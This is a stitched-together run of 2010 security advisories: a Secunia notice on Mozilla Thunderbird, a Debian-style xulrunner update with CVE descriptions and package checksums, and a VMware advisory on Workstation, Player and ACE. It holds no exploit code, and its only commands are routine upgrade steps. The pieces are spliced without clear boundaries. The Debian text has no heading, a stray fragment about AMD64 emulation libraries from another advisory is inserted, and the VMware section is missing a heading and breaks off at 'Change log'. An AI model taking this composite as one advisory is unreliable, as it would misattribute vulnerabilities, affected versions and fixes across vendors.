VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/40642/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=40642
RELEASE DATE: 2010-07-22
DISCUSS ADVISORY: http://secunia.com/advisories/40642/#comments
AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s)
http://secunia.com/advisories/40642/
ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS
https://ca.secunia.com/?page=viewadvisory&vuln_id=40642
ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING
http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/
DESCRIPTION: Some weaknesses and vulnerabilities have been reported in Mozilla Thunderbird, which can be exploited by malicious people to disclose potentially sensitive information, potentially conduct cross-site scripting attacks, bypass certain security restrictions, and compromise a user's system.
For more information: SA39925
SOLUTION: Update to Thunderbird 3.0.6 and 3.1.1.
ORIGINAL ADVISORY: http://www.mozilla.org/security/announce/2010/mfsa2010-34.html http://www.mozilla.org/security/announce/2010/mfsa2010-38.html http://www.mozilla.org/security/announce/2010/mfsa2010-39.html http://www.mozilla.org/security/announce/2010/mfsa2010-40.html http://www.mozilla.org/security/announce/2010/mfsa2010-41.html http://www.mozilla.org/security/announce/2010/mfsa2010-42.html http://www.mozilla.org/security/announce/2010/mfsa2010-43.html http://www.mozilla.org/security/announce/2010/mfsa2010-44.html http://www.mozilla.org/security/announce/2010/mfsa2010-46.html http://www.mozilla.org/security/announce/2010/mfsa2010-47.html
OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/
About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities.
Subscribe: http://secunia.com/advisories/secunia_security_advisories/
Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/
Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor.
Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
.
CVE-2010-1208
"regenrecht" discovered that incorrect memory handling in DOM
parsing could lead to the execution of arbitrary code.
CVE-2010-1211
Jesse Ruderman, Ehsan Akhgari, Mats Palmgren, Igor Bukanov, Gary
Kwong, Tobias Markus and Daniel Holbert discovered crashes in the
layout engine, which might allow the execution of arbitrary code.
CVE-2010-2751
Jordi Chancel discovered that the location could be spoofed to
appear like a secured page.
CVE-2010-2753
"regenrecht" discovered that incorrect memory handling in XUL
parsing could lead to the execution of arbitrary code.
CVE-2010-2754
Soroush Dalili discovered an information leak in script processing.
For the stable distribution (lenny), these problems have been fixed in version 1.9.0.19-3.
For the unstable distribution (sid), these problems have been fixed in version 1.9.1.11-1.
For the experimental distribution, these problems have been fixed in version 1.9.2.7-1.
We recommend that you upgrade your xulrunner packages.
Upgrade instructions
wget url will fetch the file for you dpkg -i file.deb will install the referenced file.
If you are using the apt-get package manager, use the line for sources.list as given below:
apt-get update will update the internal database apt-get upgrade will install corrected packages
You may use an automated update by adding the resources from the footer to the proper configuration.
Debian GNU/Linux 5.0 alias lenny
Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.19-3.diff.gz Size/MD5 checksum: 149955 e6ec4540373a8dfbea5c1e63f5b628b2 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.19-3.dsc Size/MD5 checksum: 1755 59f9033377f2450ad114d9ee4367f9c7 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner_1.9.0.19.orig.tar.gz Size/MD5 checksum: 44174623 83667df1e46399960593fdd8832e958e
Architecture independent packages:
http://security.debian.org/pool/updates/main/x/xulrunner/libmozillainterfaces-java_1.9.0.19-3_all.deb Size/MD5 checksum: 1466246 a3b5c8b34df7e2077a5e3c5c0d911b85
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_alpha.deb Size/MD5 checksum: 165496 ad7c134eeadc1a2aa751c289052d32f1 http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_alpha.deb Size/MD5 checksum: 433152 57f7a88c05eece5c0ea17517646267bb http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_alpha.deb Size/MD5 checksum: 72550 b581302383396b57f7e07aa4564245b3 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_alpha.deb Size/MD5 checksum: 51155444 37595efd28303ec3a88d294b58c1e7aa http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_alpha.deb Size/MD5 checksum: 9487312 452f2c3b26bb249711720ade76e77c3f http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_alpha.deb Size/MD5 checksum: 223422 9ce6e6f35412321405c27618a3550763 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_alpha.deb Size/MD5 checksum: 113478 f4946488381af317acb3bd27da3e372e http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_alpha.deb Size/MD5 checksum: 940250 abb2d020d4cce2e5547d17dd94323cee http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_alpha.deb Size/MD5 checksum: 3357434 a26b339fee481f1ae5494ee0983e3e75
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_amd64.deb Size/MD5 checksum: 50381710 4e6df9133e326ca7fe1d91adab87609b http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_amd64.deb Size/MD5 checksum: 3291324 01a75923a6b796c2e1f3c02e4584072f http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_amd64.deb Size/MD5 checksum: 152266 0a9e05d5e36920cf9cb6c9e39357679b http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_amd64.deb Size/MD5 checksum: 7735106 eedecb0183cd911bf7416be5f61cf88e http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_amd64.deb Size/MD5 checksum: 374604 7a71d4ce527727f43225fc1cdc6b3915 http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_amd64.deb Size/MD5 checksum: 70226 f8860e988f030333c59f893582e17da0 http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_amd64.deb Size/MD5 checksum: 890738 0db2e5b458ae1495dce575688a27ef2a http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_amd64.deb Size/MD5 checksum: 223326 1d128ae917c5dab4e977ffb018cb704c http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_amd64.deb Size/MD5 checksum: 101830 2bb9a62d6454d0b7ef6da98cc07b4013
arm architecture (ARM)
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_arm.deb Size/MD5 checksum: 140950 d9044d5f823661f4a1ef11c47971d6e2 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_arm.deb Size/MD5 checksum: 3584768 6ff8221347684a334d6f358d2c8f2dcc http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_arm.deb Size/MD5 checksum: 6802070 e489c87976c243d040f568a8e04a7466 http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_arm.deb Size/MD5 checksum: 351056 dd61fc5b425e296ef00120b4cfbc5604 http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_arm.deb Size/MD5 checksum: 68552 819703fc0550ee6473572ea3655ab1f5 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_arm.deb Size/MD5 checksum: 84224 f3915220a86a6a31e48b845d2af7f249 http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_arm.deb Size/MD5 checksum: 222376 cb0563f3e5220ceb6f42b8e6471eb883 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_arm.deb Size/MD5 checksum: 49349776 4037a4ab7eeb964c24c95fbb905edbe6 http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_arm.deb Size/MD5 checksum: 815334 c055e242c82b7643c67712602e4f3215
armel architecture (ARM EABI)
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_armel.deb Size/MD5 checksum: 822978 f8609edb961b6c71732c17575393644a http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_armel.deb Size/MD5 checksum: 6962470 fc143ac75279405ef99a3e045439adeb http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_armel.deb Size/MD5 checksum: 3583846 db81fc2e4c8a30fbaf0b176f6d7e77a5 http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_armel.deb Size/MD5 checksum: 142446 016a6aa2efa9e49788c97bc925d90bbb http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_armel.deb Size/MD5 checksum: 353294 65f40d8a434c6b430685ef1a54246888 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_armel.deb Size/MD5 checksum: 50182030 97009b62c3d65b5e715f363d7a5a2e0c http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_armel.deb Size/MD5 checksum: 223380 30fd707dea85e43894c84036115920a3 http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_armel.deb Size/MD5 checksum: 70694 e5892c32e9850d86138ebf15ad317b63 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_armel.deb Size/MD5 checksum: 84758 a94402fed374f82a1ffeb338cb2a4cbb
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_hppa.deb Size/MD5 checksum: 223614 ea284c98cc97b10b879d6174b81cb486 http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_hppa.deb Size/MD5 checksum: 899460 290c89b8835d773b8fd240f5610dc63c http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_hppa.deb Size/MD5 checksum: 72280 1d32724f444212696e28d15dc22386af http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_hppa.deb Size/MD5 checksum: 413386 e78a2aabb581f3f7f8da9cb531d6a883 http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_hppa.deb Size/MD5 checksum: 158762 89855347fdf8833df8fd643cfd6a2f10 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_hppa.deb Size/MD5 checksum: 51267722 b51b03ef591a26a4bb72fb0c58e610c0 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_hppa.deb Size/MD5 checksum: 3632562 2d9a207f01319a7bd8f3eb72b3762c77 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_hppa.deb Size/MD5 checksum: 9523510 0f38b76b0074881d4b12823eedc40846 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_hppa.deb Size/MD5 checksum: 106998 32d701f55bd4cc6e0f7160c3b5db43aa
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_i386.deb Size/MD5 checksum: 49553140 cd9fb750075df895e2ad46a8fe4c8bdf http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_i386.deb Size/MD5 checksum: 852228 f04ee6f2c26e9bda77477d64a13f3c53 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_i386.deb Size/MD5 checksum: 79554 e69019a20fc3e8750faf73961cae8a38 http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_i386.deb Size/MD5 checksum: 224454 c7e441828615fa66d9907b6407a2b1ad http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_i386.deb Size/MD5 checksum: 351828 85e4711445491850841c2f05102f2bd2 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_i386.deb Size/MD5 checksum: 6609818 b99e5d5f75686adcea1c3570fb82ead5 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_i386.deb Size/MD5 checksum: 3573826 2869c274453928b8b110d8aee7dcba96 http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_i386.deb Size/MD5 checksum: 142966 847a37421b7980378c81c5e818c2df3d http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_i386.deb Size/MD5 checksum: 68968 1eee7343caee6a8a23a141bf6b653fa4
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_ia64.deb Size/MD5 checksum: 224078 a9dc6949ac6ef39884d1cb58929e20fc http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_ia64.deb Size/MD5 checksum: 3693822 602f37b927bc425803730a66d17e8bec http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_ia64.deb Size/MD5 checksum: 542370 6015bef0d96154f73c32b2031c8bbf70 http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_ia64.deb Size/MD5 checksum: 77166 1a94ec379b6e210cf35c1116939fc5f7 http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_ia64.deb Size/MD5 checksum: 813100 d0cdc640bf4a68973942cf563b7f7d7b http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_ia64.deb Size/MD5 checksum: 181192 54ef9505c0b0a0b62539dc3d983a8f83 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_ia64.deb Size/MD5 checksum: 11340432 b833d183a5337231c512aba60e733213 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_ia64.deb Size/MD5 checksum: 49734538 21b8086eb33e228f4a3800307a721558 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_ia64.deb Size/MD5 checksum: 121688 1e8f51c8c5d1097d5c0e4b8fd6743ec7
mips architecture (MIPS (Big Endian))
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_mips.deb Size/MD5 checksum: 3611102 8f2980b314f14ff7cf1c244ed11ee638 http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_mips.deb Size/MD5 checksum: 145574 f38aa4d16323e517d075d1de833a7a35 http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_mips.deb Size/MD5 checksum: 380888 73bf50fdf8fd49a2251f3c13db9e0a2c http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_mips.deb Size/MD5 checksum: 7677088 d034f72357eb3276850bea226dfc3489 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_mips.deb Size/MD5 checksum: 96932 9c55e0f731b1a507e77abb54ea7c2b08 http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_mips.deb Size/MD5 checksum: 223126 cc6d3e47d51d4a15cd05ef6af47560c2 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_mips.deb Size/MD5 checksum: 51902590 b9cafda15eba1ae28b5b054bd82e9d62 http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_mips.deb Size/MD5 checksum: 919306 764f458b99647036fbdb1b36768e9b99 http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_mips.deb Size/MD5 checksum: 70412 c674d096e73e7f353733e502bbc9cd05
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_mipsel.deb Size/MD5 checksum: 378984 c66e5ff8815e2386755ece9c9a34b820 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_mipsel.deb Size/MD5 checksum: 50034074 88479753fa54a417df183b78d0bb6ed1 http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_mipsel.deb Size/MD5 checksum: 145324 a801aeefc7fbf555ab407eaeb4c35295 http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_mipsel.deb Size/MD5 checksum: 70170 3145be02d89d6e205de5d89b269b9d8d http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_mipsel.deb Size/MD5 checksum: 3311114 4dac1eff7f53b49976d984606e76afe6 http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_mipsel.deb Size/MD5 checksum: 900836 6727b545324904a39f31261db59f516b http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_mipsel.deb Size/MD5 checksum: 97046 2953be8b2d4df3994abd68d6f95de215 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_mipsel.deb Size/MD5 checksum: 7384772 6666f68f98fa2cc81d9e3106c958360b http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_mipsel.deb Size/MD5 checksum: 223416 a3ad25d92dc8f8e09352bc1fbce07989
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_powerpc.deb Size/MD5 checksum: 95068 18f76fe7d470194c6320df8b42e7b09b http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_powerpc.deb Size/MD5 checksum: 888120 b426372622e1ac0164db3f25589a5447 http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_powerpc.deb Size/MD5 checksum: 152544 e3b9205b45b66a3fcf4937c44897a7d8 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_powerpc.deb Size/MD5 checksum: 3285670 a63c4ce33c3f482584b32cfe50488700 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_powerpc.deb Size/MD5 checksum: 7287440 f9d042196ccedd4dfb4da6d3e45ca2b1 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_powerpc.deb Size/MD5 checksum: 51458688 a669258d296192b6bd48b68006f9b618 http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_powerpc.deb Size/MD5 checksum: 223412 b900b19a182c059590bfcdb9495851ef http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_powerpc.deb Size/MD5 checksum: 73306 94fdad8b176e63c0c791d19a026ce4b0 http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_powerpc.deb Size/MD5 checksum: 362778 79f1ea4633cf0147da60871533750312
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_s390.deb Size/MD5 checksum: 156410 6e986f5714d7052295a32253daea02a9 http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_s390.deb Size/MD5 checksum: 73182 f3b9b343586f554ac37e5c7c8970a28a http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_s390.deb Size/MD5 checksum: 407006 5919961e64253609b9eacc6a31a19b87 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_s390.deb Size/MD5 checksum: 8401766 a23f6d0b7ac0b83997635feff3977ac2 http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_s390.deb Size/MD5 checksum: 223402 f08c12d85314436f6331b75e2e18b1c7 http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_s390.deb Size/MD5 checksum: 909824 8c8c3aa62be4c19e97351562dcbe1694 http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_s390.deb Size/MD5 checksum: 3308768 50226e505e97362404ffbe3e770775fe http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_s390.deb Size/MD5 checksum: 105828 1e5fc5d7be3c5ab803dd71e8391c06bb http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_s390.deb Size/MD5 checksum: 51242096 ebae3e5b1eb3fd2d9470cbe117b8ced9
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-dbg_1.9.0.19-3_sparc.deb Size/MD5 checksum: 49406432 caf251c788fe4f76679f600bd1d7b1c0 http://security.debian.org/pool/updates/main/x/xulrunner/spidermonkey-bin_1.9.0.19-3_sparc.deb Size/MD5 checksum: 70192 33434a3b887ac076d88c0a4e425b3c29 http://security.debian.org/pool/updates/main/x/xulrunner/python-xpcom_1.9.0.19-3_sparc.deb Size/MD5 checksum: 144136 359a3cac1ee340f79eb9a53ac65f62ed http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9_1.9.0.19-3_sparc.deb Size/MD5 checksum: 7181582 4b0f8aaf9a51e7c76073afbb7ea33c6e http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-dev_1.9.0.19-3_sparc.deb Size/MD5 checksum: 3583844 11cb9b988b9eac3564f11ed310a8d77e http://security.debian.org/pool/updates/main/x/xulrunner/xulrunner-1.9-gnome-support_1.9.0.19-3_sparc.deb Size/MD5 checksum: 84544 0646f157f384a6a1ffcc3052035d1789 http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d_1.9.0.19-3_sparc.deb Size/MD5 checksum: 350470 1c643effc57e45c6afc964f2284cda7e http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs-dev_1.9.0.19-3_sparc.deb Size/MD5 checksum: 223260 77281a13fcc78aacd93cf479621ccf74 http://security.debian.org/pool/updates/main/x/xulrunner/libmozjs1d-dbg_1.9.0.19-3_sparc.deb Size/MD5 checksum: 821854 32eba751571daa1dcd4db30e7a3b7b2c
These files will probably be moved into the stable distribution on its next update. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ .
Background
AMD64 x86 emulation base libraries provides pre-compiled 32-bit libraries. They are included in this advisory for the sake of completeness. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
VMware Security Advisory
Advisory ID: VMSA-2010-0014 Synopsis: VMware Workstation, Player, and ACE address several security issues. Issue date: 2010-09-23 Updated on: 2010-09-23 (initial release of advisory) CVE numbers: CVE-2010-3277 CVE-2010-1205 CVE-2010-0205 CVE-2010-2249 CVE-2010-0434 CVE-2010-0425
- Summary
VMware Workstation and Player address a potential installer security issue and security issues in libpng. VMware ACE Management Server (AMS) for Windows updates Apache httpd.
- Relevant releases
VMware Workstation 7.1.1 and earlier, VMware Player 3.1.1 and earlier, VMware ACE Management Server 2.7.1 and earlier,
Note: VMware Server was declared End Of Availability on January 2010, support will be limited to Technical Guidance for the duration of the support term.
- Problem Description
a. VMware Workstation and Player installer security issue
The Workstation 7.x and Player 3.x installers will load an index.htm
file located in the current working directory on which Workstation
7.x or Player 3.x is being installed. This may allow an attacker to
display a malicious file if they manage to get their file onto the
system prior to installation.
The issue can only be exploited at the time that Workstation 7.x or
Player 3.x is being installed. Installed versions of Workstation and
Player are not affected. The security issue is no longer present in
the installer of the new versions of Workstation 7.x and Player 3.x
(see table below for the version numbers).
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the name CVE-2010-3277 to this issue.
VMware would like to thank Alexander Trofimov and Marc Esher for
independently reporting this issue to VMware.
The following table lists what action remediates the vulnerability
(column 4) if a solution is available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
VirtualCenter any Windows not affected
Workstation 7.x any 7.1.2 build 301548 or later *
Workstation 6.5.x any not affected
Player 3.x any 3.1.2 build 301548 or later *
Player 2.5.x any not affected
AMS any any not affected
Server any any not affected
Fusion any Mac OS/X not affected
ESXi any ESXi not affected
ESX any ESX not affected
-
Note: This only affects the installer, if you have a version of Workstation or Player installed you are not vulnerable. Third party libpng updated to version 1.2.44
A buffer overflow condition in libpng is addressed that could potentially lead to code execution with the privileges of the application using libpng. Two potential denial of service issues are also addressed in the update.
The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the names CVE-2010-1205, CVE-2010-0205, CVE-2010-2249 to these issues.
The following table lists what action remediates the vulnerability (column 4) if a solution is available.
VMware Product Running Replace with/ Product Version on Apply Patch ============= ======== ======= ================= VirtualCenter any Windows not affected
Workstation 7.1.x any 7.1.2 build 301548 or later Workstation 6.5.x any affected, patch pending
Player 3.1.x any 3.1.2 build 301548 or later Player 2.5.x any affected, patch pending
AMS any any not affected
Server any any affected, no patch planned
Fusion any Mac OS/X not affected
ESXi any ESXi not affected
ESX any ESX not affected
c. VMware ACE Management Server (AMS) for Windows updates Apache httpd version 2.2.15.
A function in Apache HTTP Server when multithreaded MPM is used
does not properly handle headers in subrequests in certain
circumstances which may allow remote attackers to obtain sensitive
information via a crafted request that triggers access to memory
locations associated with an earlier request.
The Apache mod_isapi module can be forced to unload a specific
library before the processing of a request is complete, resulting
in memory corruption.
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has assigned the names CVE-2010-0434 and CVE-2010-0425 to the
issues addressed in this update.
Column 4 of the following table lists the action required to
remediate the vulnerability in each release, if a solution is
available.
VMware Product Running Replace with/
Product Version on Apply Patch
============= ======== ======= =================
VirtualCenter any Windows not affected
Workstation any any not affected
Player any any not affected
AMS any Windows 2.7.2 build 301548 or later
AMS any Linux affected, patch pending *
Server any any not affected
Fusion any Mac OS/X not affected
ESXi any ESXi not affected
ESX any ESX not affected
-
Note CVE-2010-0425 is not applicable to AMS running on Linux
-
Solution Please review the patch/release notes for your product and version and verify the md5sum and/or the sha1sum of your downloaded file.
VMware Workstation 7.1.2
http://www.vmware.com/download/ws/ Release notes: http://downloads.vmware.com/support/ws71/doc/releasenotes_ws712.html
Workstation for Windows 32-bit and 64-bit with VMware Tools
md5sum: 2e9715ec297dc3ca904ad2707d3e2614
sha1sum: 55b2b99f67c3dacd402fb9880999086efd264e7a
Workstation for Windows 32-bit and 64-bit without VMware Tools
md5sum: 066929f59aef46f11f4d9fd6c6b36e4d
sha1sum: def776a28ee1a21b1ad26e836ae868551fff6fc3
VMware Player 3.1.2
http://www.vmware.com/download/player/ Release notes:
http://downloads.vmware.com/support/player31/doc/releasenotes_player312.html
VMware Player for Windows 32-bit and 64-bit
md5sum: 3f289cb33af5e425c92d8512fb22a7ba
sha1sum: bf67240c1f410ebeb8dcb4f6d7371334bf9a6b70
VMware Player for Linux 32-bit
md5sum: 11e3e3e8753e1d9abbbb92c4e3c1dfe8
sha1sum: dd1dbcdb1f4654eefc11472b68934dcb69842749
VMware Player for Linux 64-bit
md5sum: 2ab08e0d4050719845a64d334ca15bb1
sha1sum: f024ad84ec831fce8667dfa9601851da5d9fa59c
VMware ACE Management Server 2.7.2
http://downloads.vmware.com/d/info/desktop_downloads/vmware_ace/2_7 Release notes: http://downloads.vmware.com/support/ace27/doc/releasenotes_ace272.html
ACE Management Server for Windows
md5sum: 02f0072b8e48a98ed914b633f070d550
sha1sum: 94a68eac4a328d21a741879b9d063227c0dc1ce4
- References
CVE numbers http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3277 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1205 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0205 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2249 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0434 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0425
- Change log
